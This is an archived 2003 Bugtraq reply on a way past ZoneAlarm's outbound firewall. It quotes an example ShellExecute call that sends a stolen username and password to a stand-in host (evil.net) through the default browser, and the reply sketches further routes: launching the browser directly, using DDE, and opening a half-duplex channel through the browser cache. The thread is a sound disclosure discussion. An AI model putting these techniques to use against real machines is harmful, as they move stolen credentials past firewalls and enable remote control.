lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 03 Jul 2003 11:57:27 -0700
From: Dan Harkless <bugtraq@...kless.org>
To: bugtraq@...urityfocus.com
Subject: Re: Bypassing ZoneAlarm (limited)



While I was being interviewed for an InfoSecurityMag.com article on this (in
which the author unfortunately got multiple fundamental facts wrong), I
thought of a couple of other points that are probably worth mentioning.

<aceh@...vetch.bg> writes:
> Windows dll shell32.dll exports a well known and documented function called
> ShellExecute. From Win32 Programmer's refference:
> 
> >HINSTANCE ShellExecute(
> >  HWND hwnd,	          // handle to parent window
> >  LPCTSTR lpOperation,    // pointer to string that specifies 
> >                          // operation to perform
> >  LPCTSTR lpFile,	  // pointer to filename or folder name string
> >  LPCTSTR lpParameters,	  // pointer to string that specifies 
> >                          //executable-file parameters 
> >  LPCTSTR lpDirectory,    // pointer to string that specifies default 
> directory
> >  INT nShowCmd            // whether file is shown when opened
> >  );
> 
> When the lpFile parameter is an Internet url, windows invokes Internet 
> Explorer (or more accurately - the default web browser), which in 99% of 
> the cases is allowed to access Internet, with that url. Example:
> 
> ShellExecute(
>   0,
>   "open",
>   "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
>   0,
>   0,
>   SW_HIDE //This doesn't work. 
>           //I think it is supposed to hide the window but ...
>   );

The level of detail you're going into on ShellExecute() kind of implies the
vulnerability is limited to that one system call, but of course a malicious
executable could directly run iexplore.exe or any other executable that
allows opening arbitrary URLs, and pass those URLs via the commandline or
via other means like DDE.

> The info leaked is limited by the maximum allowed url length, but that 
> could be more than enough for a malicious application to send some 
> username/password/cookie/cc_number info to malicious server.

And the vulnerability wouldn't be limited to simplex communications from
host to server.  The trojan could employ techniques (as simple as reading
Internet Explorer cache files) to establish half-duplex communications,
potentially allowing an attacker to gain remote control over your machine
despite the presence of ZoneAlarm.

Of course if a trojan is able to run arbitrary commands with your user
privileges (especially if you're in the Administrators group, as, for
instance, the initial account created on Windows XP boxes is), there are
other ways an attacker could gain control of your machine.  Particularly if
you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it
doesn't notice DLLs getting changed.

--
Dan Harkless
bugtraq@...kless.org
http://harkless.org/dan/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ